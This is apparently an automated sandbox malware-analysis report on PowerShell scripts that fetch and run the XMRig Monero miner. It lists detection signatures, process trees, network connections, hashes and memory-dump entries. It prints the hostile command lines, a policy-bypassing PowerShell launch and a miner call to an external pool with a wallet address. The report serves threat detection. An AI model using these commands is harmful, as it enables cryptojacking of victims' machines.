| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1256 wrote to memory of 2988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1256 wrote to memory of 2988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4252,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4132,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/1256-0-0x00007FFC78DF3000-0x00007FFC78DF5000-memory.dmp
memory/1256-10-0x00000138C8C10000-0x00000138C8C32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wztumpec.2w0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1256-11-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/1256-12-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/1256-14-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/1256-15-0x00000138CAF80000-0x00000138CAF92000-memory.dmp
memory/1256-16-0x00000138C8C60000-0x00000138C8C6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2988-47-0x00000265E8B20000-0x00000265E8B40000-memory.dmp
memory/2988-48-0x00000265E8B70000-0x00000265E8B90000-memory.dmp
memory/2988-49-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/1256-50-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/2988-52-0x00000265EA350000-0x00000265EA370000-memory.dmp
memory/1256-51-0x00007FFC78DF3000-0x00007FFC78DF5000-memory.dmp
memory/2988-53-0x00000265EA370000-0x00000265EA390000-memory.dmp
memory/2988-54-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/1256-55-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/2988-56-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-58-0x00000265EA350000-0x00000265EA370000-memory.dmp
memory/2988-57-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-59-0x00000265EA370000-0x00000265EA390000-memory.dmp
memory/2988-60-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-61-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-62-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-63-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-64-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-65-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-66-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-67-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-68-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-69-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-70-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-71-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-72-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-73-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-74-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-75-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-76-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-77-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-78-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-79-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-80-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-81-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-82-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-83-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-84-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-85-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-86-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-87-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-88-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-89-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-90-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-91-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-92-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-93-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-94-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-95-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-96-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-97-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-98-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-99-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-100-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-101-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-102-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-103-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-104-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-105-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-106-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-107-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-108-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-109-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-110-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-111-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-112-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-113-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-114-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-115-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-116-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-117-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-118-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:56
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2760 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2760 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3808,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4288,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 184.28.176.65:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
memory/2760-0-0x00007FFB0E693000-0x00007FFB0E695000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mh4zoot1.q4v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2760-10-0x000001BF5EB80000-0x000001BF5EBA2000-memory.dmp
memory/2760-11-0x00007FFB0E690000-0x00007FFB0F151000-memory.dmp
memory/2760-12-0x00007FFB0E690000-0x00007FFB0F151000-memory.dmp
memory/2760-14-0x00007FFB0E690000-0x00007FFB0F151000-memory.dmp
memory/2760-15-0x000001BF5EF80000-0x000001BF5EF92000-memory.dmp
memory/2760-16-0x000001BF5EBD0000-0x000001BF5EBDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/624-47-0x00000195F3F10000-0x00000195F3F30000-memory.dmp
memory/624-48-0x00000195F3F60000-0x00000195F3F80000-memory.dmp
memory/624-49-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/2760-50-0x00007FFB0E690000-0x00007FFB0F151000-memory.dmp
memory/624-52-0x00000195F4180000-0x00000195F41A0000-memory.dmp
memory/2760-51-0x00007FFB0E693000-0x00007FFB0E695000-memory.dmp
memory/624-54-0x00000195F5950000-0x00000195F5970000-memory.dmp
memory/2760-53-0x00007FFB0E690000-0x00007FFB0F151000-memory.dmp
memory/624-55-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/2760-56-0x00007FFB0E690000-0x00007FFB0F151000-memory.dmp
memory/624-57-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-59-0x00000195F4180000-0x00000195F41A0000-memory.dmp
memory/624-58-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-60-0x00000195F5950000-0x00000195F5970000-memory.dmp
memory/624-61-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-62-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-63-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-64-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-65-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-66-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-67-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-68-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-69-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-70-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-71-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-72-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-73-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-74-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-75-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-76-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-77-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-78-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-79-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-80-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-81-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-82-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-83-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-84-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-85-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-86-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-87-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-88-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-89-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-90-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-91-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-92-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-93-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-94-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-95-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-96-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-97-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-98-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-99-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-100-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-101-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-102-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-103-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-104-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-105-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-106-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-107-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-108-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-109-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-110-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-111-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-112-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-113-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-114-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-115-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-116-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-117-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-118-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
memory/624-119-0x00007FF63C740000-0x00007FF63D373000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:17
Platform
win10-20240611-en
Max time kernel
1797s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
